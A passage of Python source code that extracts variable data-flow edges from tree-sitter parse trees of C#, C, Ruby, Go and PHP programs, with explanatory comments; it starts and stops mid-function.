        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # while loop: two passes over all children, then de-duplicate edges.
    elif root_node.type in while_statement:
        DFG=[]
        for i in range(2):
            for child in root_node.children:
                temp,states=DFG_csharp(child,index_to_code,states)
                DFG+=temp
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    else:
        # Generic node: recurse into children (do_first_statement is empty
        # for C#, so only the second loop runs).
        DFG=[]
        for child in root_node.children:
            if child.type in do_first_statement:
                temp,states=DFG_csharp(child,index_to_code,states)
                DFG+=temp
        for child in root_node.children:
            if child.type not in do_first_statement:
                temp,states=DFG_csharp(child,index_to_code,states)
                DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
def get_identifier_node(root_node):
    """Descend through wrapper declarators (pointer/array/function/...)
    until the underlying identifier node is reached and return it.
    """
    node = root_node
    while node.type != 'identifier':
        # Each wrapper declarator nests the real name under 'declarator'.
        node = node.child_by_field_name('declarator')
    return node
def DFG_c(root_node,index_to_code,states):
    """Extract data-flow edges from a C tree-sitter parse tree.

    Same contract as DFG_python: returns ``(edges, states)`` where each edge
    is ``(token, token_idx, relation, [src_tokens], [src_idxs])`` and
    ``states`` maps variable names to their possible defining token indexes.
    ``states`` is copied on entry; the caller's dict is untouched.
    """
    # Node-type groups selecting the handling branch below.
    assignment=['assignment_expression']
    def_statement=['init_declarator']
    increment_statement=['update_expression']
    if_statement=['if_statement','else']
    for_statement=['for_statement']
    # enhanced_for_statement=['enhanced_for_statement']
    while_statement=['while_statement']
    do_first_statement=[]
    declaration = ['declaration']
    other_declarator=['pointer_declarator','function_declarator', 'array_declarator', 'parenthesized_declarator']
    states=states.copy()
    # Leaf token (string literals treated as single tokens; comments skipped).
    if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
        idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
        if root_node.type==code:
            # Keyword / punctuation token: no data flow.
            return [],states
        elif code in states:
            # Known variable: link this use to its recorded definitions.
            return [(code,idx,'comesFrom',[code],states[code].copy())],states
        else:
            if root_node.type=='identifier':
                states[code]=[idx]
            return [(code,idx,'comesFrom',[],[])],states
    # Declaration: may carry several declarators after the type specifier;
    # only children from the first declarator onward are processed.
    elif root_node.type in declaration:
        first_declarator = root_node.child_by_field_name('declarator')
        first_declarator_met = False
        DFG=[]
        for child in root_node.children:
            if child == first_declarator:
                first_declarator_met = True
            # Skip the leading type specifier tokens.
            if not first_declarator_met:
                continue
            if child.type in def_statement:
                # Initialized declarator: name flows from its value.
                name=get_identifier_node(child.child_by_field_name('declarator'))
                value=child.child_by_field_name('value')
                name_indexs=tree_to_variable_index(name,index_to_code)
                value_indexs=tree_to_variable_index(value,index_to_code)
                temp,states=DFG_c(value,index_to_code,states)
                DFG+=temp
                for index1 in name_indexs:
                    idx1,code1=index_to_code[index1]
                    for index2 in value_indexs:
                        idx2,code2=index_to_code[index2]
                        DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
                        states[code1]=[idx1]
            elif child.type in other_declarator or child.type == 'identifier':
                # Bare declarator: the name defines itself.
                name=get_identifier_node(child)
                indexs=tree_to_variable_index(name,index_to_code)
                for index in indexs:
                    idx,code=index_to_code[index]
                    DFG.append((code,idx,'comesFrom',[],[]))
                    states[code]=[idx]
        return sorted(DFG,key=lambda x:x[1]),states
    # elif root_node.type in def_statement:
    #     name=root_node.child_by_field_name('declarator')
    #     value=root_node.child_by_field_name('value')
    #     DFG=[]
    #     if value is None:
    #         indexs=tree_to_variable_index(name,index_to_code)
    #         for index in indexs:
    #             idx,code=index_to_code[index]
    #             DFG.append((code,idx,'comesFrom',[],[]))
    #             states[code]=[idx]
    #         return sorted(DFG,key=lambda x:x[1]),states
    #     name_indexs=tree_to_variable_index(name,index_to_code)
    #     value_indexs=tree_to_variable_index(value,index_to_code)
    #     temp,states=DFG_c(value,index_to_code,states)
    #     DFG+=temp
    #     for index1 in name_indexs:
    #         idx1,code1=index_to_code[index1]
    #         for index2 in value_indexs:
    #             idx2,code2=index_to_code[index2]
    #             DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
    #             states[code1]=[idx1]
    #     return sorted(DFG,key=lambda x:x[1]),states
    # Assignment: every LHS token computed from every RHS token.
    elif root_node.type in assignment:
        left_nodes=root_node.child_by_field_name('left')
        right_nodes=root_node.child_by_field_name('right')
        DFG=[]
        temp,states=DFG_c(right_nodes,index_to_code,states)
        DFG+=temp
        name_indexs=tree_to_variable_index(left_nodes,index_to_code)
        value_indexs=tree_to_variable_index(right_nodes,index_to_code)
        for index1 in name_indexs:
            idx1,code1=index_to_code[index1]
            for index2 in value_indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # ++/-- update expression: the variable is computed from itself.
    elif root_node.type in increment_statement:
        DFG=[]
        indexs=tree_to_variable_index(root_node,index_to_code)
        for index1 in indexs:
            idx1,code1=index_to_code[index1]
            for index2 in indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # if/else chain: condition+then on a copy; else branches from incoming
    # states; all possible outcomes merged at the end.
    elif root_node.type in if_statement:
        DFG=[]
        current_states=states.copy()
        others_states=[]
        flag=False
        tag=False
        if 'else' in root_node.type:
            tag=True
        for child in root_node.children:
            if 'else' in child.type:
                tag=True
            if child.type not in if_statement and flag is False:
                temp,current_states=DFG_c(child,index_to_code,current_states)
                DFG+=temp
            else:
                # flag latches once a nested if/else child is reached.
                flag=True
                temp,new_states=DFG_c(child,index_to_code,states)
                DFG+=temp
                others_states.append(new_states)
        others_states.append(current_states)
        # Without an else branch the incoming states survive as an outcome.
        if tag is False:
            others_states.append(states)
        new_states={}
        for dic in others_states:
            for key in dic:
                if key not in new_states:
                    new_states[key]=dic[key].copy()
                else:
                    new_states[key]+=dic[key]
        for key in new_states:
            new_states[key]=sorted(list(set(new_states[key])))
        return sorted(DFG,key=lambda x:x[1]),new_states
    # for loop: one full pass, then a second pass from the init declaration
    # onward to capture loop-carried flow; duplicates merged.
    elif root_node.type in for_statement:
        DFG=[]
        for child in root_node.children:
            temp,states=DFG_c(child,index_to_code,states)
            DFG+=temp
        flag=False
        for child in root_node.children:
            if flag:
                temp,states=DFG_c(child,index_to_code,states)
                DFG+=temp
            elif child.type=="declaration":
                flag=True
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # elif root_node.type in enhanced_for_statement:
    #     name=root_node.child_by_field_name('name')
    #     value=root_node.child_by_field_name('value')
    #     body=root_node.child_by_field_name('body')
    #     DFG=[]
    #     for i in range(2):
    #         temp,states=DFG_java(value,index_to_code,states)
    #         DFG+=temp
    #         name_indexs=tree_to_variable_index(name,index_to_code)
    #         value_indexs=tree_to_variable_index(value,index_to_code)
    #         for index1 in name_indexs:
    #             idx1,code1=index_to_code[index1]
    #             for index2 in value_indexs:
    #                 idx2,code2=index_to_code[index2]
    #                 DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
    #             states[code1]=[idx1]
    #         temp,states=DFG_java(body,index_to_code,states)
    #         DFG+=temp
    #     dic={}
    #     for x in DFG:
    #         if (x[0],x[1],x[2]) not in dic:
    #             dic[(x[0],x[1],x[2])]=[x[3],x[4]]
    #         else:
    #             dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
    #             dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
    #     DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
    #     return sorted(DFG,key=lambda x:x[1]),states
    # while loop: two passes over all children, then de-duplicate edges.
    elif root_node.type in while_statement:
        DFG=[]
        for i in range(2):
            for child in root_node.children:
                temp,states=DFG_c(child,index_to_code,states)
                DFG+=temp
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    else:
        # Generic node: recurse into children (do_first_statement is empty
        # for C, so only the second loop runs).
        DFG=[]
        for child in root_node.children:
            if child.type in do_first_statement:
                temp,states=DFG_c(child,index_to_code,states)
                DFG+=temp
        for child in root_node.children:
            if child.type not in do_first_statement:
                temp,states=DFG_c(child,index_to_code,states)
                DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
def DFG_ruby(root_node,index_to_code,states):
    """Extract data-flow edges from a Ruby tree-sitter parse tree.

    Same contract as the sibling DFG_* extractors: returns ``(edges, states)``
    where each edge is ``(token, token_idx, relation, [src_tokens],
    [src_idxs])`` and ``states`` maps variable names to their possible
    defining token indexes.

    Args:
        root_node: tree-sitter node to process.
        index_to_code: maps a token node's ``(start_point, end_point)`` to
            ``(token_index, token_text)``.
        states: incoming variable-definition map; never mutated.

    Returns:
        ``(edges, states)`` — edges sorted by token index, plus the updated
        variable-definition map.
    """
    # Node-type groups selecting the handling branch below.
    assignment=['assignment','operator_assignment']
    if_statement=['if','elsif','else','unless','when']
    for_statement=['for']
    while_statement=['while_modifier','until']
    do_first_statement=[]
    def_statement=['keyword_parameter']
    # Fix: copy on entry, matching DFG_python/DFG_java/DFG_csharp/DFG_c.
    # Previously the copy happened only inside the leaf branch, so the
    # assignment/if/for/while branches mutated the CALLER's dict in place —
    # in particular the no-else fallback ``others_states.append(states)``
    # then merged already-mutated state instead of the incoming one.
    states=states.copy()
    # Leaf token (string literals treated as single tokens; comments skipped).
    if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
        idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
        if root_node.type==code:
            # Keyword / punctuation token: no data flow.
            return [],states
        elif code in states:
            # Known variable: link this use to its recorded definitions.
            return [(code,idx,'comesFrom',[code],states[code].copy())],states
        else:
            if root_node.type=='identifier':
                states[code]=[idx]
            return [(code,idx,'comesFrom',[],[])],states
    # Keyword parameter: the name flows from its default value (if any).
    elif root_node.type in def_statement:
        name=root_node.child_by_field_name('name')
        value=root_node.child_by_field_name('value')
        DFG=[]
        if value is None:
            indexs=tree_to_variable_index(name,index_to_code)
            for index in indexs:
                idx,code=index_to_code[index]
                DFG.append((code,idx,'comesFrom',[],[]))
                states[code]=[idx]
            return sorted(DFG,key=lambda x:x[1]),states
        else:
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            temp,states=DFG_ruby(value,index_to_code,states)
            DFG+=temp
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
                states[code1]=[idx1]
            return sorted(DFG,key=lambda x:x[1]),states
    # Assignment (incl. operator assignment): LHS computed from RHS.
    elif root_node.type in assignment:
        left_nodes=[x for x in root_node.child_by_field_name('left').children if x.type!=',']
        right_nodes=[x for x in root_node.child_by_field_name('right').children if x.type!=',']
        # Fall back to whole-node pairing when tuple arities differ or a side
        # has no sub-tokens.
        if len(right_nodes)!=len(left_nodes):
            left_nodes=[root_node.child_by_field_name('left')]
            right_nodes=[root_node.child_by_field_name('right')]
        if len(left_nodes)==0:
            left_nodes=[root_node.child_by_field_name('left')]
        if len(right_nodes)==0:
            right_nodes=[root_node.child_by_field_name('right')]
        if root_node.type=="operator_assignment":
            left_nodes=[root_node.children[0]]
            right_nodes=[root_node.children[-1]]
        DFG=[]
        for node in right_nodes:
            temp,states=DFG_ruby(node,index_to_code,states)
            DFG+=temp
        for left_node,right_node in zip(left_nodes,right_nodes):
            left_tokens_index=tree_to_variable_index(left_node,index_to_code)
            right_tokens_index=tree_to_variable_index(right_node,index_to_code)
            temp=[]
            for token1_index in left_tokens_index:
                idx1,code1=index_to_code[token1_index]
                temp.append((code1,idx1,'computedFrom',[index_to_code[x][1] for x in right_tokens_index],
                             [index_to_code[x][0] for x in right_tokens_index]))
                states[code1]=[idx1]
            DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
    # if/elsif/else/unless/when: each branch evaluated against a copy, then
    # all possible outcomes merged.
    elif root_node.type in if_statement:
        DFG=[]
        current_states=states.copy()
        others_states=[]
        tag=False
        if 'else' in root_node.type:
            tag=True
        for child in root_node.children:
            if 'else' in child.type:
                tag=True
            if child.type not in if_statement:
                temp,current_states=DFG_ruby(child,index_to_code,current_states)
                DFG+=temp
            else:
                temp,new_states=DFG_ruby(child,index_to_code,states)
                DFG+=temp
                others_states.append(new_states)
        others_states.append(current_states)
        # Without an else branch the incoming states survive as an outcome.
        if tag is False:
            others_states.append(states)
        new_states={}
        for dic in others_states:
            for key in dic:
                if key not in new_states:
                    new_states[key]=dic[key].copy()
                else:
                    new_states[key]+=dic[key]
        for key in new_states:
            new_states[key]=sorted(list(set(new_states[key])))
        return sorted(DFG,key=lambda x:x[1]),new_states
    # for loop: pattern computed from the iterated value; two passes so the
    # second captures loop-carried flow, then de-duplicate.
    elif root_node.type in for_statement:
        DFG=[]
        for i in range(2):
            left_nodes=[root_node.child_by_field_name('pattern')]
            right_nodes=[root_node.child_by_field_name('value')]
            assert len(right_nodes)==len(left_nodes)
            for node in right_nodes:
                temp,states=DFG_ruby(node,index_to_code,states)
                DFG+=temp
            for left_node,right_node in zip(left_nodes,right_nodes):
                left_tokens_index=tree_to_variable_index(left_node,index_to_code)
                right_tokens_index=tree_to_variable_index(right_node,index_to_code)
                temp=[]
                for token1_index in left_tokens_index:
                    idx1,code1=index_to_code[token1_index]
                    temp.append((code1,idx1,'computedFrom',[index_to_code[x][1] for x in right_tokens_index],
                                 [index_to_code[x][0] for x in right_tokens_index]))
                    states[code1]=[idx1]
                DFG+=temp
            temp,states=DFG_ruby(root_node.child_by_field_name('body'),index_to_code,states)
            DFG+=temp
        # Merge duplicate (token, idx, relation) edges from the two passes.
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # while/until: two passes over all children, then de-duplicate edges.
    elif root_node.type in while_statement:
        DFG=[]
        for i in range(2):
            for child in root_node.children:
                temp,states=DFG_ruby(child,index_to_code,states)
                DFG+=temp
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    else:
        # Generic node: recurse into children (do_first_statement is empty
        # for Ruby, so only the second loop runs).
        DFG=[]
        for child in root_node.children:
            if child.type in do_first_statement:
                temp,states=DFG_ruby(child,index_to_code,states)
                DFG+=temp
        for child in root_node.children:
            if child.type not in do_first_statement:
                temp,states=DFG_ruby(child,index_to_code,states)
                DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
def DFG_go(root_node,index_to_code,states):
    """Extract a data-flow graph (DFG) from a Go parse tree.

    Recursively walks root_node (presumably a tree-sitter node -- TODO
    confirm against the caller) and returns (DFG, states):

    * DFG   -- list of 5-tuples (token_text, token_idx, relation,
               dep_token_texts, dep_token_idxs), relation being
               'comesFrom' or 'computedFrom', sorted by token_idx.
    * states -- dict mapping a variable's source text to the list of
               token indices of its most recent definition(s).

    index_to_code maps a (start_point, end_point) span to
    (token_idx, token_text).
    """
    # Node-type tables driving the dispatch below (Go grammar node names).
    assignment=['assignment_statement',]
    def_statement=['var_spec']
    increment_statement=['inc_statement']
    if_statement=['if_statement','else']
    for_statement=['for_statement']
    enhanced_for_statement=[]  # unused for Go; kept for parity with sibling DFG_* functions
    while_statement=[]         # unused for Go
    do_first_statement=[]
    # Copy so this recursion level does not mutate the caller's states.
    states=states.copy()
    # --- Leaf token (string literals are treated as a single token) ---
    if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
        idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
        if root_node.type==code:
            # Punctuation/keyword token (its type equals its own text): no data flow.
            return [],states
        elif code in states:
            # Known variable: link this use to its recorded definition sites.
            return [(code,idx,'comesFrom',[code],states[code].copy())],states
        else:
            if root_node.type=='identifier':
                # First sighting of an identifier: record it as its own definition.
                states[code]=[idx]
            return [(code,idx,'comesFrom',[],[])],states
    # --- Variable declaration: var name [= value] ---
    elif root_node.type in def_statement:
        name=root_node.child_by_field_name('name')
        value=root_node.child_by_field_name('value')
        DFG=[]
        if value is None:
            # Declaration without initializer: define with no dependencies.
            indexs=tree_to_variable_index(name,index_to_code)
            for index in indexs:
                idx,code=index_to_code[index]
                DFG.append((code,idx,'comesFrom',[],[]))
                states[code]=[idx]
            return sorted(DFG,key=lambda x:x[1]),states
        else:
            # With initializer: every name token comesFrom every value token.
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            temp,states=DFG_go(value,index_to_code,states)
            DFG+=temp
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
                states[code1]=[idx1]
            return sorted(DFG,key=lambda x:x[1]),states
    # --- Assignment: left tokens are computedFrom every right token ---
    elif root_node.type in assignment:
        left_nodes=root_node.child_by_field_name('left')
        right_nodes=root_node.child_by_field_name('right')
        DFG=[]
        temp,states=DFG_go(right_nodes,index_to_code,states)
        DFG+=temp
        name_indexs=tree_to_variable_index(left_nodes,index_to_code)
        value_indexs=tree_to_variable_index(right_nodes,index_to_code)
        for index1 in name_indexs:
            idx1,code1=index_to_code[index1]
            for index2 in value_indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
            states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- Increment (x++ / x--): the variable is computedFrom itself ---
    elif root_node.type in increment_statement:
        DFG=[]
        indexs=tree_to_variable_index(root_node,index_to_code)
        for index1 in indexs:
            idx1,code1=index_to_code[index1]
            for index2 in indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
            states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- Branching: process each branch, then merge the branch states ---
    elif root_node.type in if_statement:
        DFG=[]
        current_states=states.copy()
        others_states=[]
        flag=False  # becomes True once the first alternative branch is seen
        tag=False   # True if an 'else' part exists
        if 'else' in root_node.type:
            tag=True
        for child in root_node.children:
            if 'else' in child.type:
                tag=True
            if child.type not in if_statement and flag is False:
                # Condition and first branch: thread current_states through.
                temp,current_states=DFG_go(child,index_to_code,current_states)
                DFG+=temp
            else:
                # Alternative branches restart from the incoming states.
                flag=True
                temp,new_states=DFG_go(child,index_to_code,states)
                DFG+=temp
                others_states.append(new_states)
        others_states.append(current_states)
        if tag is False:
            # No else: the branch may be skipped entirely, so keep the
            # incoming states as one of the merged possibilities.
            others_states.append(states)
        # Union the definition sites per variable across all branch states.
        new_states={}
        for dic in others_states:
            for key in dic:
                if key not in new_states:
                    new_states[key]=dic[key].copy()
                else:
                    new_states[key]+=dic[key]
        for key in states:
            if key not in new_states:
                new_states[key]=states[key]
            else:
                new_states[key]+=states[key]
        for key in new_states:
            # Deduplicate and order the merged definition sites.
            new_states[key]=sorted(list(set(new_states[key])))
        return sorted(DFG,key=lambda x:x[1]),new_states
    # --- for loop: two passes so iteration i can depend on iteration i-1 ---
    elif root_node.type in for_statement:
        DFG=[]
        for child in root_node.children:
            temp,states=DFG_go(child,index_to_code,states)
            DFG+=temp
        # Second pass: re-process the update clause and everything after
        # the for_clause to capture loop-carried dependencies.
        flag=False
        for child in root_node.children:
            if flag:
                temp,states=DFG_go(child,index_to_code,states)
                DFG+=temp
            elif child.type=="for_clause":
                if child.child_by_field_name('update') is not None:
                    temp,states=DFG_go(child.child_by_field_name('update'),index_to_code,states)
                    DFG+=temp
                flag=True
        # Merge duplicate edges produced by the two passes: union the
        # dependency lists of edges sharing (text, idx, relation).
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- Generic node: recurse into children ---
    else:
        # do_first_statement is empty for Go, so the first loop matches
        # nothing and children are processed in source order.
        DFG=[]
        for child in root_node.children:
            if child.type in do_first_statement:
                temp,states=DFG_go(child,index_to_code,states)
                DFG+=temp
        for child in root_node.children:
            if child.type not in do_first_statement:
                temp,states=DFG_go(child,index_to_code,states)
                DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
def DFG_php(root_node,index_to_code,states):
    """Extract a data-flow graph (DFG) from a PHP parse tree.

    Recursively walks root_node (presumably a tree-sitter node -- TODO
    confirm against the caller) and returns (DFG, states):

    * DFG   -- list of 5-tuples (token_text, token_idx, relation,
               dep_token_texts, dep_token_idxs), relation being
               'comesFrom' or 'computedFrom', sorted by token_idx.
    * states -- dict mapping a variable's source text to the list of
               token indices of its most recent definition(s).

    index_to_code maps a (start_point, end_point) span to
    (token_idx, token_text).
    """
    # Node-type tables driving the dispatch below (PHP grammar node names).
    assignment=['assignment_expression','augmented_assignment_expression']
    def_statement=['simple_parameter']
    increment_statement=['update_expression']
    if_statement=['if_statement','else_clause']
    for_statement=['for_statement']
    enhanced_for_statement=['foreach_statement']
    while_statement=['while_statement']
    do_first_statement=[]

    def _dedup_edges(edges):
        # Merge duplicate edges produced by multi-pass loop processing:
        # union the dependency lists of edges sharing (text, idx, relation),
        # then re-emit one edge per key, ordered by token index.
        merged={}
        for x in edges:
            key=(x[0],x[1],x[2])
            if key not in merged:
                merged[key]=[x[3],x[4]]
            else:
                merged[key][0]=list(set(merged[key][0]+x[3]))
                merged[key][1]=sorted(list(set(merged[key][1]+x[4])))
        return [(k[0],k[1],k[2],v[0],v[1]) for k,v in sorted(merged.items(),key=lambda t:t[0][1])]

    # Copy so this recursion level does not mutate the caller's states.
    states=states.copy()
    # --- Leaf token (string literals are treated as a single token) ---
    if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
        idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
        if root_node.type==code:
            # Punctuation/keyword token (its type equals its own text): no data flow.
            return [],states
        elif code in states:
            # Known variable: link this use to its recorded definition sites.
            return [(code,idx,'comesFrom',[code],states[code].copy())],states
        else:
            if root_node.type=='identifier':
                # First sighting of an identifier: record it as its own definition.
                states[code]=[idx]
            return [(code,idx,'comesFrom',[],[])],states
    # --- Function parameter, optionally with a default value ---
    elif root_node.type in def_statement:
        name=root_node.child_by_field_name('name')
        value=root_node.child_by_field_name('default_value')
        DFG=[]
        if value is None:
            # Parameter without default: define with no dependencies.
            indexs=tree_to_variable_index(name,index_to_code)
            for index in indexs:
                idx,code=index_to_code[index]
                DFG.append((code,idx,'comesFrom',[],[]))
                states[code]=[idx]
            return sorted(DFG,key=lambda x:x[1]),states
        else:
            # With default: every name token comesFrom every default-value token.
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            temp,states=DFG_php(value,index_to_code,states)
            DFG+=temp
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
                states[code1]=[idx1]
            return sorted(DFG,key=lambda x:x[1]),states
    # --- Assignment: left tokens are computedFrom every right token ---
    elif root_node.type in assignment:
        left_nodes=root_node.child_by_field_name('left')
        right_nodes=root_node.child_by_field_name('right')
        DFG=[]
        temp,states=DFG_php(right_nodes,index_to_code,states)
        DFG+=temp
        name_indexs=tree_to_variable_index(left_nodes,index_to_code)
        value_indexs=tree_to_variable_index(right_nodes,index_to_code)
        for index1 in name_indexs:
            idx1,code1=index_to_code[index1]
            for index2 in value_indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
            states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- Increment/decrement: the variable is computedFrom itself ---
    elif root_node.type in increment_statement:
        DFG=[]
        indexs=tree_to_variable_index(root_node,index_to_code)
        for index1 in indexs:
            idx1,code1=index_to_code[index1]
            for index2 in indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
            states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # --- Branching: process each branch, then merge the branch states ---
    elif root_node.type in if_statement:
        # NOTE(review): the original carried a `tag` flag (tracking the
        # presence of an else part) that was computed but never read in the
        # PHP variant; it is removed here. The unconditional merge of the
        # incoming `states` below already covers the no-else case.
        DFG=[]
        current_states=states.copy()
        others_states=[]
        flag=False  # becomes True once the first alternative branch is seen
        for child in root_node.children:
            if child.type not in if_statement and flag is False:
                # Condition and first branch: thread current_states through.
                temp,current_states=DFG_php(child,index_to_code,current_states)
                DFG+=temp
            else:
                # else/elseif clauses restart from the incoming states.
                flag=True
                temp,new_states=DFG_php(child,index_to_code,states)
                DFG+=temp
                others_states.append(new_states)
        others_states.append(current_states)
        # Union the definition sites per variable across all branch states.
        new_states={}
        for dic in others_states:
            for key in dic:
                if key not in new_states:
                    new_states[key]=dic[key].copy()
                else:
                    new_states[key]+=dic[key]
        for key in states:
            if key not in new_states:
                new_states[key]=states[key]
            else:
                new_states[key]+=states[key]
        for key in new_states:
            # Deduplicate and order the merged definition sites.
            new_states[key]=sorted(list(set(new_states[key])))
        return sorted(DFG,key=lambda x:x[1]),new_states
    # --- for loop: two passes so iteration i can depend on iteration i-1 ---
    elif root_node.type in for_statement:
        DFG=[]
        for child in root_node.children:
            temp,states=DFG_php(child,index_to_code,states)
            DFG+=temp
        # Second pass: re-process everything after the init assignment to
        # capture loop-carried dependencies.
        flag=False
        for child in root_node.children:
            if flag:
                temp,states=DFG_php(child,index_to_code,states)
                DFG+=temp
            elif child.type=="assignment_expression":
                flag=True
        DFG=_dedup_edges(DFG)
        return sorted(DFG,key=lambda x:x[1]),states
    # --- foreach loop ---
    elif root_node.type in enhanced_for_statement:
        # The first variable_name child is the iterated expression, the
        # next one is the loop variable.
        name=None
        value=None
        for child in root_node.children:
            if child.type=='variable_name' and value is None:
                value=child
            elif child.type=='variable_name' and name is None:
                name=child
                break
        body=root_node.child_by_field_name('body')
        DFG=[]
        # Two passes to model loop-carried dependencies.
        for i in range(2):
            temp,states=DFG_php(value,index_to_code,states)
            DFG+=temp
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
            temp,states=DFG_php(body,index_to_code,states)
            DFG+=temp
        DFG=_dedup_edges(DFG)
        return sorted(DFG,key=lambda x:x[1]),states
    # --- while loop: two passes to model loop-carried dependencies ---
    elif root_node.type in while_statement:
        DFG=[]
        for i in range(2):
            for child in root_node.children:
                temp,states=DFG_php(child,index_to_code,states)
                DFG+=temp
        DFG=_dedup_edges(DFG)
